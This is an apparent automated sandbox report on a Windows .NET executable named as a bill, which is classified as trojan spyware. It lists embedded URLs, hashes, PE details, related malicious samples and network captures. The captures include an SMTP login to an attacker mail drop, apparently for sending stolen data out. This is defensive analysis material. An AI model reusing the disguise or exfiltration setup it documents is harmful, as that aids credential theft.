http://www.galapagosdesign.com/DPlease | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                                          http://www.sakkal.comBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fonts.comxBILL-OOO566876.exe, 00000000.00000003.202973628.00000000053EB000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipBILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com=BILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.apache.org/licenses/LICENSE-2.0BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.comBILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpfalse
                                              high
                                              http://DynDns.comDynDNSBILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.tiro.comxBILL-OOO566876.exe, 00000000.00000003.204324110.00000000053EB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://8kun.top/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haBILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.carterandcone.comYBILL-OOO566876.exe, 00000000.00000003.206174068.00000000053D7000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.carterandcone.comuBILL-OOO566876.exe, 00000000.00000003.206256359.00000000053D9000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.comaBILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmldBILL-OOO566876.exe, 00000000.00000003.208525319.000000000540D000.00000004.00000001.sdmpfalse
                                                high
                                                http://en.wBILL-OOO566876.exe, 00000000.00000003.203328834.00000000053D7000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://raw.githubusercontent.com/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.carterandcone.comlBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cnBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000003.208195250.000000000540D000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/cabarga.htmlBILL-OOO566876.exe, 00000000.00000003.208525319.000000000540D000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://a.4cdn.org/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers8BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                          high
                                                          https://github.com/murrty/YChanEx/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://YdPNTdHEQXue9T.orgBILL-OOO566876.exe, 00000002.00000002.476441058.0000000002EFC000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.476845028.0000000002F88000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://api.github.com/repos/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.tiro.comcBILL-OOO566876.exe, 00000000.00000003.203388064.00000000053EB000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown

                                                              Contacted IPs


                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.199.225 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385473
Start date: 12.04.2021
Start time: 15:16:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: BILL-OOO566876.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 11.9% (good quality ratio 6.6%)
• Quality average: 32.2%
• Quality standard deviation: 36.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 204.79.197.200, 13.107.21.200, 52.147.198.201, 20.50.102.62, 184.30.24.56, 92.122.213.194, 92.122.213.247, 13.88.21.125, 205.185.216.42, 205.185.216.10, 20.54.26.129, 13.64.90.137
                                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

Time | Type | Description
15:17:11 | API Interceptor | 969x Sleep call for process: BILL-OOO566876.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

Match: 208.91.199.225
Associated Sample Name / URL | Detection
ORDER 9387383900.xlsx | malicious
usd 420232.exe | malicious
P037725600.exe | malicious
VAT INVOICE.exe | malicious
New Order PO#121012020_____PDF_______.exe | malicious
swift Copy.xls.exe | malicious
AD1-2001028L.exe | malicious
AD1-2001028L (2).exe | malicious
#U7f8e#U91d1#U532f#U738728.84 (USD 40,257+5% #U7a05.exe | malicious
balance payment.exe | malicious
Image0001.exe | malicious
money.exe | malicious
new order.doc | malicious
New Enquiry.MORROCCO.exe | malicious
Purchase Order #07916813.exe | malicious
QUOTATION 03-28-2021.exe | malicious
PURCHASE ORDER COPY.exe | malicious
credit notification.exe | malicious
PURCHASE ORDER COPY.exe | malicious
Ref_0866_0817.doc | malicious

                                                                                                      Domains

Match: us2.smtp.mailhostbox.com
Associated Sample Name / URL | Detection | Context (resolved IP)
SecuriteInfo.com.Scr.Malcodegdn30.29716.exe | malicious | 208.91.198.143
ORDER 9387383900.xlsx | malicious | 208.91.199.225
Payment Advice Note from 02.04.2021 to 608761.exe | malicious | 208.91.199.223
e0xd7qhFaMk3Dpx.exe | malicious | 208.91.198.143
PAGO FACTURA V-8680.exe | malicious | 208.91.198.143
usd 420232.exe | malicious | 208.91.199.225
P037725600.exe | malicious | 208.91.199.225
VAT INVOICE.exe | malicious | 208.91.199.224
VAT INVOICE.exe | malicious | 208.91.199.225
NEW ORDER.exe | malicious | 208.91.198.143
TRANSFERENCIA AL EXTERIOR U810295.exe | malicious | 208.91.198.143
PAYMENT SWIFT COPY MT103.exe | malicious | 208.91.198.143
UPDATED SOA.exe | malicious | 208.91.199.224
BANK PAYMENT.exe | malicious | 208.91.199.224
VAT INVOICE.exe | malicious | 208.91.199.224
IMG_00000000001.PDF.exe | malicious | 208.91.198.143
New Order PO#121012020_____PDF_______.exe | malicious | 208.91.198.143
swift Copy.xls.exe | malicious | 208.91.199.225
FN vw Safety 1 & 2.exe | malicious | 208.91.199.223
MV TBN.uslfze.exe | malicious | 208.91.199.224

                                                                                                      ASN

Match: PUBLIC-DOMAIN-REGISTRYUS
Associated Sample Name / URL | Detection | Context (contacted IP)
SecuriteInfo.com.Scr.Malcodegdn30.29716.exe | malicious | 208.91.198.143
commercial invoice & packing list doc.exe | malicious | 43.225.55.205
ORDER 9387383900.xlsx | malicious | 208.91.199.225
Payment Advice Note from 02.04.2021 to 608761.exe | malicious | 208.91.199.223
Dubai REGA 2021UAE.exe | malicious | 208.91.199.135
e0xd7qhFaMk3Dpx.exe | malicious | 208.91.198.143
Dridex.xls | malicious | 208.91.199.159
documents-351331057.xlsm | malicious | 162.251.80.27
documents-351331057.xlsm | malicious | 162.251.80.27
DUBAI UAEGH092021.exe | malicious | 208.91.199.135
PAGO FACTURA V-8680.exe | malicious | 208.91.198.143
documents-1819557117.xlsm | malicious | 162.251.80.27
documents-1819557117.xlsm | malicious | 162.251.80.27
usd 420232.exe | malicious | 208.91.199.225
P037725600.exe | malicious | 208.91.199.225
VAT INVOICE.exe | malicious | 208.91.199.224
VAT INVOICE.exe | malicious | 208.91.199.224
NEW ORDER.exe | malicious | 208.91.198.143
TRANSFERENCIA AL EXTERIOR U810295.exe | malicious | 208.91.198.143
PAYMENT SWIFT COPY MT103.exe | malicious | 208.91.198.143

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\BILL-OOO566876.exe.log
Process: C:\Users\user\Desktop\BILL-OOO566876.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 525
Entropy (8bit): 5.2874233355119316
Encrypted: false
SSDEEP: 12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5: 61CCF53571C9ABA6511D696CB0D32E45
SHA1: A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256: 3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512: 90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.6241220288435505
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: BILL-OOO566876.exe
File size: 893952
MD5: 1c84862e5b015bcecf6a194d17172dcf
SHA1: a3e0a0bda2cdef94089a6012bd025113f9fbead9
SHA256: ea29689e038f2a801066054f8ae2e3e3884127e8ac897f5467055250ce2b42f9
SHA512: 786b1e6f5c283b33bb55e252355346af43715b81f926cb035c9935ba031958e21413e2bd54fa7c8fc198b7250431361a3abf39adc418d03a72a9d3afd9d42bdc
SSDEEP: 12288:g/m/1Vjriddyflf5T716samRCChXNNAdUbuTSYScJ/cfCTpc7kg5M7Cdb/G/uxFB:AaSyB5T716rmRCQB6T5/hT5kb/
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............0.................. ........@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4db91e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60731BE9 [Sun Apr 11 15:55:21 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v2.0.50727
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(The 96 entries that follow are identical: the entry point is the standard managed-executable stub that jumps through the IAT entry at RVA 0x2000 to mscoree!_CorExeMain, and the zero bytes after it decode as add byte ptr [eax], al.)

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xdb8c4          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xdc000          0x5c0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xde000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xd9924       0xd9a00   False     0.765819078475   data       7.62974179137   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xdc000          0x5c0         0x600     False     0.428385416667   data       4.12173224524   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xde000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA      Size   Type                                                                        Language  Country
RT_VERSION   0xdc0a0  0x330  data
RT_MANIFEST  0xdc3d0  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright Microsoft 2018
Assembly Version  1.0.0.0
InternalName      mWu.exe
FileVersion       1.0.0.0
CompanyName       Microsoft
LegalTrademarks
Comments
ProductName       ASCIIArt
ProductVersion    1.0.0.0
FileDescription   ASCIIArt
OriginalFilename  mWu.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Apr 12, 2021 15:18:42.176328897 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:42.352276087 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:42.352453947 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:42.875756979 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:42.876359940 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.050717115 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.050755024 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.052225113 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.228472948 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.229031086 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.407139063 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.407423019 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.585530043 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.585781097 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.771244049 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.771477938 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.946533918 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:43.960316896 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.960429907 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.960508108 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:43.960582018 CEST  49739        587        192.168.2.3     208.91.199.225
Apr 12, 2021 15:18:44.134759903 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:44.134810925 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:44.231465101 CEST  587          49739      208.91.199.225  192.168.2.3
Apr 12, 2021 15:18:44.280231953 CEST  49739        587        192.168.2.3     208.91.199.225

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 12, 2021 15:16:57.626996040 CEST  50620        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:16:57.676660061 CEST  53           50620      8.8.8.8          192.168.2.3
Apr 12, 2021 15:16:57.950560093 CEST  64938        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:16:58.002713919 CEST  53           64938      8.8.8.8          192.168.2.3
Apr 12, 2021 15:16:59.123594046 CEST  60152        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:16:59.172378063 CEST  53           60152      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:00.325143099 CEST  57544        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:00.382375002 CEST  53           57544      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:10.669775009 CEST  55984        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:10.718667030 CEST  53           55984      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:11.884468079 CEST  64185        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:11.935942888 CEST  53           64185      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:12.807837009 CEST  65110        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:12.859298944 CEST  53           65110      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:16.975037098 CEST  58361        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:17.026108980 CEST  53           58361      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:22.659409046 CEST  63492        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:22.708585978 CEST  53           63492      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:28.712503910 CEST  60831        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:28.770036936 CEST  53           60831      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:29.946908951 CEST  60100        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:29.998414993 CEST  53           60100      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:33.402914047 CEST  53195        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:33.451730013 CEST  53           53195      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:34.819503069 CEST  50141        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:34.881642103 CEST  53           50141      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:45.875643015 CEST  53023        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:45.934130907 CEST  53           53023      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:50.349664927 CEST  49563        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:50.401159048 CEST  53           49563      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:51.484985113 CEST  51352        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:51.536576033 CEST  53           51352      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:53.174205065 CEST  59349        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:53.205549002 CEST  57084        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:53.222877026 CEST  53           59349      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:53.264185905 CEST  53           57084      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:54.363640070 CEST  58823        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:54.420811892 CEST  53           58823      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:55.627034903 CEST  57568        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:55.675615072 CEST  53           57568      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:56.907742977 CEST  50540        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:56.956568956 CEST  53           50540      8.8.8.8          192.168.2.3
Apr 12, 2021 15:17:58.024431944 CEST  54366        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:17:58.073045015 CEST  53           54366      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:03.563596010 CEST  53034        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:03.631918907 CEST  53           53034      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:09.803677082 CEST  57762        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:09.855288029 CEST  53           57762      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:13.240446091 CEST  55435        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:13.297455072 CEST  53           55435      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:29.325659990 CEST  50713        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:29.374316931 CEST  53           50713      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:41.811301947 CEST  56132        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:42.129463911 CEST  53           56132      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:44.853279114 CEST  58987        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:44.901916027 CEST  53           58987      8.8.8.8          192.168.2.3
Apr 12, 2021 15:18:47.035443068 CEST  56579        53         192.168.2.3      8.8.8.8
Apr 12, 2021 15:18:47.092525959 CEST  53           56579      8.8.8.8          192.168.2.3

DNS Queries

Timestamp                             Source IP    Dest IP      Trans ID  OP Code             Name                Type            Class
Apr 12, 2021 15:18:41.811301947 CEST  192.168.2.3  8.8.8.8      0x51eb    Standard query (0)  smtp.syntrnomh.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                             Source IP    Dest IP      Trans ID  Reply Code    Name                      CName                     Address         Type                    Class
Apr 12, 2021 15:18:42.129463911 CEST  8.8.8.8      192.168.2.3  0x51eb    No error (0)  smtp.syntrnomh.com        us2.smtp.mailhostbox.com  -               CNAME (Canonical name)  IN (0x0001)
Apr 12, 2021 15:18:42.129463911 CEST  8.8.8.8      192.168.2.3  0x51eb    No error (0)  us2.smtp.mailhostbox.com  -                         208.91.199.225  A (IP address)          IN (0x0001)
Apr 12, 2021 15:18:42.129463911 CEST  8.8.8.8      192.168.2.3  0x51eb    No error (0)  us2.smtp.mailhostbox.com  -                         208.91.198.143  A (IP address)          IN (0x0001)
Apr 12, 2021 15:18:42.129463911 CEST  8.8.8.8      192.168.2.3  0x51eb    No error (0)  us2.smtp.mailhostbox.com  -                         208.91.199.224  A (IP address)          IN (0x0001)
Apr 12, 2021 15:18:42.129463911 CEST  8.8.8.8      192.168.2.3  0x51eb    No error (0)  us2.smtp.mailhostbox.com  -                         208.91.199.223  A (IP address)          IN (0x0001)

SMTP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP          Commands
Apr 12, 2021 15:18:42.875756979 CEST  587          49739      208.91.199.225   192.168.2.3      220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 12, 2021 15:18:42.876359940 CEST  49739        587        192.168.2.3      208.91.199.225   EHLO 134349
Apr 12, 2021 15:18:43.050755024 CEST  587          49739      208.91.199.225   192.168.2.3      250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Apr 12, 2021 15:18:43.052225113 CEST  49739        587        192.168.2.3      208.91.199.225   AUTH login cmFpbmllLndhbmdAc3ludHJub21oLmNvbQ==
Apr 12, 2021 15:18:43.228472948 CEST  587          49739      208.91.199.225   192.168.2.3      334 UGFzc3dvcmQ6
Apr 12, 2021 15:18:43.407139063 CEST  587          49739      208.91.199.225   192.168.2.3      235 2.7.0 Authentication successful
Apr 12, 2021 15:18:43.407423019 CEST  49739        587        192.168.2.3      208.91.199.225   MAIL FROM:<rainie.wang@syntrnomh.com>
Apr 12, 2021 15:18:43.585530043 CEST  587          49739      208.91.199.225   192.168.2.3      250 2.1.0 Ok
Apr 12, 2021 15:18:43.585781097 CEST  49739        587        192.168.2.3      208.91.199.225   RCPT TO:<rainie.wang@syntrnomh.com>
Apr 12, 2021 15:18:43.771244049 CEST  587          49739      208.91.199.225   192.168.2.3      250 2.1.5 Ok
